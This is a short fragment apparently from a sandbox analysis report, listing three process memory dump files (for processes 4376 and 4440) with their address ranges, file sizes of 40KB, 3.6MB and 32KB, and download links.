memory/4376-2-0x00000000033B0000-0x00000000033BA000-memory.dmp

Filesize
40KB

Download
memory/4376-1-0x0000000000F20000-0x00000000012B6000-memory.dmp

Filesize
3.6MB

Download
memory/4440-149-0x00000000001F0000-0x00000000001F8000-memory.dmp

Filesize
32KB

Download